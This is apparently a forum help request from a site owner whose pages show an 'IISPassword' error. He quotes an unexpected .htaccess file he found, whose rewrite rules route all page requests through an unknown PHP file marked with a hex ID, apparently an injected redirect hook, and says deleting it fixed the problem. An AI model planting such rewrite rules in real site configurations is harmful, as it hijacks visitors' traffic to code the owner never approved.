Problem: IISPassword

Jeff

Hi

My website suddenly gets the IISPassword error message when acccessing the
page. No page is displayed only a message this:

IISPassword
The page cannot be displayed
There is a problem with the page youare trying to reach and it cannot
be displayed. It is most likely that configuration files for this url are
corrupted.

What might be wrong? I haven't done any changes to the configuration. Think
it's the ISP which have done something wrong here. Too bad my site was
rejected from dir.yahoo.com because of this and it costs me $300...

any suggestions?

Jeff

I checked in the files in my webdiretory. And to my surprise there was a
..htacess file there:

#3BF5B65BE123{
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !PE(.*).php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml)
3BF5B65BE123.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
#3BF5B65BE123}

Wonder what this code actually are doing?

I deleted this .htaccess file and the problem was solved. In addition I've
sent email to ISP support and asked why they did this